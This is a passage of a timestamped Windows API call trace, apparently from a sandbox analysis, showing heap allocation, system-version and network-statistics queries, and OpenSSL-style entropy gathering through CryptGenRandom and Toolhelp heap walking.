String=0x9f4fa40) returned 0x0 [0056.492] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257400 | out: hHeap=0x660000) returned 1 [0056.492] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257400 [0056.492] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10000) returned 0x9c82710 [0056.526] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0056.527] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x326a590 [0056.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257668 [0056.527] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0056.532] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0056.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b450 [0056.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165a8 [0056.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326ed70 [0056.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x6aa490 [0056.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326ea10 [0056.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326e9f8 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32165f0 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326e758 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32414e8 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326e740 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f1d8 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f1a8 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216830 [0056.562] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f190 [0056.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326e728 [0056.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326ed58 [0056.567] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f1c0 [0056.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0056.572] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3247810 [0056.577] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3247810, Size=0x218) returned 0x3299798 [0056.577] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0056.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326e728 | out: hHeap=0x660000) returned 1 [0056.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f1c0 | out: hHeap=0x660000) returned 1 [0056.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326ed58 | out: hHeap=0x660000) returned 1 [0056.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0056.582] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0056.587] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326ed58 [0056.597] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbc88 [0056.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x326f1c0 [0056.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32414c8 [0056.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x326e728 [0056.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x31cbce8 [0056.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0056.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e5e0 [0056.617] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0056.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0056.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0056.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0056.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbcc8 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f1c0 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbce8 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326e728 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32414c8 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31cbc88 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326ed58 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e5e0 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0056.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3299798 | out: hHeap=0x660000) returned 1 [0056.623] GetCurrentThreadId () returned 0x9e0 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x190) returned 0x3292330 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bd40 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3216c68 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326ed58 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2390 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257518 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbc88 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x31cbce8 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3247810 [0056.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.623] GetCurrentThreadId () returned 0x9e0 [0056.623] GetVersionExA (in: lpVersionInformation=0x9f4f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x9f4f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x9f4f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0056.623] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x74d40000 [0056.623] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0056.624] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x73520000 [0056.701] GetProcAddress (hModule=0x73520000, lpProcName="NetStatisticsGet") returned 0x7352644f [0056.701] GetProcAddress (hModule=0x73520000, lpProcName="NetApiBufferFree") returned 0x73fc13d2 [0056.701] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x9f4f02c | out: Buffer=0x9f4f02c) returned 0x0 [0056.763] GetCurrentThreadId () returned 0x9e0 [0056.763] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.764] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.764] NetApiBufferFree (Buffer=0x328f0f0) returned 0x0 [0056.764] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x9f4f02c | out: Buffer=0x9f4f02c) returned 0x0 [0056.801] GetCurrentThreadId () returned 0x9e0 [0056.801] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.801] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.801] NetApiBufferFree (Buffer=0x3296380) returned 0x0 [0056.801] FreeLibrary (hLibModule=0x73520000) returned 1 [0056.803] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextW") returned 0x74d4df14 [0056.803] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGenRandom") returned 0x74d4dfc8 [0056.803] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0056.803] CryptAcquireContextW (in: phProv=0x9f4f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4f018*=0x6b89c8) returned 1 [0056.804] CryptGenRandom (in: hProv=0x6b89c8, dwLen=0x40, pbBuffer=0x9f4f464 | out: pbBuffer=0x9f4f464) returned 1 [0056.804] GetCurrentThreadId () returned 0x9e0 [0056.804] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.804] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0056.804] CryptAcquireContextW (in: phProv=0x9f4f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x9f4f018*=0x6b89c8) returned 0 [0056.804] FreeLibrary (hLibModule=0x74d40000) returned 1 [0056.804] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0056.804] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0056.804] GetDesktopWindow () returned 0x10010 [0056.804] GetProcessWindowStation () returned 0x48 [0056.804] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x9f4efa0 | out: pvInfo=0x0, lpnLengthNeeded=0x9f4efa0) returned 0 [0056.804] GetLastError () returned 0x7a [0056.805] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x9f4ef80, nLength=0x10, lpnLengthNeeded=0x9f4efa0 | out: pvInfo=0x9f4ef80, lpnLengthNeeded=0x9f4efa0) returned 1 [0056.805] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x74f40000 [0056.805] GetProcAddress (hModule=0x74f40000, lpProcName="GetForegroundWindow") returned 0x74f62320 [0056.805] GetProcAddress (hModule=0x74f40000, lpProcName="GetCursorInfo") returned 0x74fb812f [0056.805] GetProcAddress (hModule=0x74f40000, lpProcName="GetQueueStatus") returned 0x74f63924 [0056.805] GetForegroundWindow () returned 0x301ba [0056.805] GetCurrentThreadId () returned 0x9e0 [0056.805] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.805] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.806] GetCursorInfo (in: pci=0x9f4f450 | out: pci=0x9f4f450) returned 1 [0056.806] GetQueueStatus (flags=0xbf) returned 0x0 [0056.806] GetCurrentThreadId () returned 0x9e0 [0056.806] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.806] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.806] FreeLibrary (hLibModule=0x74f40000) returned 1 [0056.806] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0056.806] GetProcAddress (hModule=0x76c20000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0056.806] GetProcAddress (hModule=0x76c20000, lpProcName="Heap32First") returned 0x76cb5763 [0056.806] GetProcAddress (hModule=0x76c20000, lpProcName="Heap32Next") returned 0x76cb594e [0056.807] GetProcAddress (hModule=0x76c20000, lpProcName="Heap32ListFirst") returned 0x76cb5621 [0056.807] GetProcAddress (hModule=0x76c20000, lpProcName="Heap32ListNext") returned 0x76cb56cb [0056.807] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0056.807] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0056.807] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0056.808] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0056.808] GetProcAddress (hModule=0x76c20000, lpProcName="Module32First") returned 0x76cb5cd9 [0056.808] GetProcAddress (hModule=0x76c20000, lpProcName="Module32Next") returned 0x76cb5dc2 [0056.808] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x6f4 [0056.817] GetTickCount () returned 0x11daec3 [0056.817] Heap32ListFirst (hSnapshot=0x6f4, lphl=0x9f4f454) returned 1 [0056.818] GetCurrentThreadId () returned 0x9e0 [0056.818] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.818] Heap32First (lphe=0x9f4efc0, th32ProcessID=0x938, th32HeapID=0x660000) returned 1 [0056.843] GetCurrentThreadId () returned 0x9e0 [0056.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.843] Heap32Next (lphe=0x9f4efc0) returned 1 [0056.863] GetTickCount () returned 0x11daef2 [0056.863] GetCurrentThreadId () returned 0x9e0 [0056.863] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.863] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.863] Heap32Next (lphe=0x9f4efc0) returned 1 [0056.882] GetTickCount () returned 0x11daf02 [0056.882] GetCurrentThreadId () returned 0x9e0 [0056.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.882] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.882] Heap32Next (lphe=0x9f4efc0) returned 1 [0056.902] GetTickCount () returned 0x11daf21 [0056.902] GetCurrentThreadId () returned 0x9e0 [0056.902] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.902] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.902] Heap32Next (lphe=0x9f4efc0) returned 1 [0056.932] GetTickCount () returned 0x11daf40 [0056.932] GetCurrentThreadId () returned 0x9e0 [0056.933] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.933] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.933] Heap32Next (lphe=0x9f4efc0) returned 1 [0056.952] GetTickCount () returned 0x11daf50 [0056.952] GetCurrentThreadId () returned 0x9e0 [0056.952] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.952] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.952] Heap32Next (lphe=0x9f4efc0) returned 1 [0056.971] GetTickCount () returned 0x11daf5f [0056.972] GetCurrentThreadId () returned 0x9e0 [0056.972] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.972] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.972] Heap32Next (lphe=0x9f4efc0) returned 1 [0056.990] GetTickCount () returned 0x11daf6f [0056.990] GetCurrentThreadId () returned 0x9e0 [0056.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0056.990] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0056.990] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.008] GetTickCount () returned 0x11daf8e [0057.008] GetCurrentThreadId () returned 0x9e0 [0057.008] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.008] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.008] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.027] GetTickCount () returned 0x11daf9e [0057.027] GetCurrentThreadId () returned 0x9e0 [0057.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.027] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.045] GetTickCount () returned 0x11dafad [0057.045] GetCurrentThreadId () returned 0x9e0 [0057.045] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.045] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.045] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.063] GetTickCount () returned 0x11dafbd [0057.063] GetCurrentThreadId () returned 0x9e0 [0057.063] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.063] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.063] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.081] GetTickCount () returned 0x11dafcd [0057.081] GetCurrentThreadId () returned 0x9e0 [0057.081] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.081] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.099] GetTickCount () returned 0x11dafdc [0057.099] GetCurrentThreadId () returned 0x9e0 [0057.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.099] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.099] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.118] GetTickCount () returned 0x11daffb [0057.118] GetCurrentThreadId () returned 0x9e0 [0057.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.118] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.118] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.136] GetTickCount () returned 0x11db00b [0057.136] GetCurrentThreadId () returned 0x9e0 [0057.136] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.136] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.153] GetTickCount () returned 0x11db01b [0057.153] GetCurrentThreadId () returned 0x9e0 [0057.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.153] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.171] GetTickCount () returned 0x11db02a [0057.171] GetCurrentThreadId () returned 0x9e0 [0057.171] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.171] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.171] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.188] GetTickCount () returned 0x11db03a [0057.188] GetCurrentThreadId () returned 0x9e0 [0057.188] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.188] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.205] GetTickCount () returned 0x11db049 [0057.205] GetCurrentThreadId () returned 0x9e0 [0057.205] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.206] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.206] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.224] GetTickCount () returned 0x11db059 [0057.224] GetCurrentThreadId () returned 0x9e0 [0057.224] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.224] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.224] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.243] GetTickCount () returned 0x11db078 [0057.243] GetCurrentThreadId () returned 0x9e0 [0057.243] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.243] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.264] GetTickCount () returned 0x11db088 [0057.264] GetCurrentThreadId () returned 0x9e0 [0057.264] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.264] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.264] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.282] GetTickCount () returned 0x11db097 [0057.282] GetCurrentThreadId () returned 0x9e0 [0057.282] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.282] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.300] GetTickCount () returned 0x11db0a7 [0057.300] GetCurrentThreadId () returned 0x9e0 [0057.300] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.301] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.301] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.319] GetTickCount () returned 0x11db0b7 [0057.319] GetCurrentThreadId () returned 0x9e0 [0057.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.319] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.338] GetTickCount () returned 0x11db0d6 [0057.338] GetCurrentThreadId () returned 0x9e0 [0057.338] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.338] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.338] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.356] GetTickCount () returned 0x11db0e5 [0057.356] GetCurrentThreadId () returned 0x9e0 [0057.356] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.356] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.356] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.374] GetTickCount () returned 0x11db0f5 [0057.375] GetCurrentThreadId () returned 0x9e0 [0057.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.375] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.375] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.393] GetTickCount () returned 0x11db105 [0057.393] GetCurrentThreadId () returned 0x9e0 [0057.393] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.393] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.393] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.411] GetTickCount () returned 0x11db114 [0057.411] GetCurrentThreadId () returned 0x9e0 [0057.411] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.411] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.411] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.430] GetTickCount () returned 0x11db133 [0057.430] GetCurrentThreadId () returned 0x9e0 [0057.430] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.430] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.430] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.460] GetTickCount () returned 0x11db143 [0057.460] GetCurrentThreadId () returned 0x9e0 [0057.460] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.460] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.460] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.478] GetTickCount () returned 0x11db162 [0057.478] GetCurrentThreadId () returned 0x9e0 [0057.478] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.478] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.478] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.497] GetTickCount () returned 0x11db172 [0057.497] GetCurrentThreadId () returned 0x9e0 [0057.497] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.497] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.497] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.515] GetTickCount () returned 0x11db181 [0057.515] GetCurrentThreadId () returned 0x9e0 [0057.515] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.515] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.515] Heap32Next (lphe=0x9f4efc0) returned 1 [0057.533] GetTickCount () returned 0x11db191 [0057.533] GetCurrentThreadId () returned 0x9e0 [0057.533] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0057.533] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0057.534] Heap32Next 